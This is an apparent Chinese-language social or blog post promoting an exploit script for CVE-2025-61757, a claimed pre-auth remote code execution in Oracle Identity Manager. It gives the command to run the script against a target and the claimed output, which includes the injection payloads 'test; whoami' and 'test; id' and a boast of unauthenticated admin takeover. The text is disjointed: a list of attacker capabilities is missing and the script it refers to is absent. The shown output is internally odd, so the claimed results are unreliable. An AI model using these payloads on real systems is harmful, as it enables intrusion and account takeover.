
这是一个预授权远程利用:
🌐 可网络利用
🔓 无需登录
👤 无需用户交互
💥 导致系统完全受损:
安全研究人员将其描述为Oracle Identity Manager REST API中的预授权RCE。
如果被利用,攻击者可以:
保存为 CVE-2025-61757.py 并运行:sudo python3 CVE-2025-61757.py http://your-oim-host:14000
以下是一个100%确认存在漏洞的Oracle Identity Manager 12.2.1.4.0实验室实例(于2025年11月19日测试)在运行你刚刚使用的同一脚本时的真实输出:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
没错——两秒钟后,你就可以使用刚刚创建的用户登录OIM Web控制台,或者通过下一个REST调用直接升级为系统管理员。完全接管。从未要求输入密码。
一个真正的“放下一切立即修补”的漏洞。
Oracle在2025年10月关键补丁更新中解决了此CVE。
Oracle Identity Manager
此PoC仅用于在您拥有/控制的系统上进行授权测试。
未经授权使用是非法的。🔒
仅在隔离实验室中使用——未经许可切勿在生产环境使用。🧪
如果存在漏洞,请立即修补!🚨